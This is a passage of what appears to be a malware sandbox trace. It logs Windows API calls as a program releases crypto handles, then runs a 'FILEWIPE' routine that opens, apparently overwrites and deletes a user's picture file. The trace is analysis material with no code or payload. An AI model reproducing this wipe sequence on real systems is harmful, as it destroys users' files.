wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.588] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.588] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.588] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.588] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.588] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.589] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.589] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.589] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.598] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.598] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.598] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.604] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.604] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.604] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.604] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.604] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.604] CryptDestroyKey (hKey=0x7c2200) returned 1 [0039.604] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.604] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.604] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.604] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.605] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.605] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.605] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.605] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.605] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.605] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.605] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.605] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.606] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.606] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.606] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.606] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0039.606] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.606] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.606] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.606] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.606] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.606] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.607] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.607] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.607] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.607] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec96c9a0, ftCreationTime.dwHighDateTime=0x1d5c32c, ftLastAccessTime.dwLowDateTime=0x82d46af0, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0x82d46af0, ftLastWriteTime.dwHighDateTime=0x1d5b647, nFileSizeHigh=0x0, nFileSizeLow=0x15c26, dwReserved0=0x0, dwReserved1=0x777648, cFileName="KmZe-_JDZKS16W.png", cAlternateFileName="KMZE-_~1.PNG")) returned 0x7c2100 [0039.608] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.608] CharLowerBuffW (in: lpsz="byte[89126]", cchLength=0xb | out: lpsz="byte[89126]") returned 0xb [0039.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.608] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.608] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.608] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.608] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.608] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.609] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.609] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.609] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kmze-_jdzks16w.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0039.610] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.610] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.610] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.610] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.610] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.610] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.610] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.611] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.611] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.611] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.611] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.611] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.611] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.611] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.611] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.611] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.611] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png", lpFilePart=0x0) returned 0x39 [0039.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec96c9a0, ftCreationTime.dwHighDateTime=0x1d5c32c, ftLastAccessTime.dwLowDateTime=0x82d46af0, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0x1750c7a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x15c26, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="KmZe-_JDZKS16W.png", cAlternateFileName="KMZE-_~1.PNG")) returned 0x7c2100 [0039.611] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kmze-_jdzks16w.png")) returned 1 [0039.613] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec96c9a0, ftCreationTime.dwHighDateTime=0x1d5c32c, ftLastAccessTime.dwLowDateTime=0x82d46af0, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0x1750c7a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x15c26, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="KmZe-_JDZKS16W.png", cAlternateFileName="KMZE-_~1.PNG")) returned 0 [0039.613] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.614] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.614] 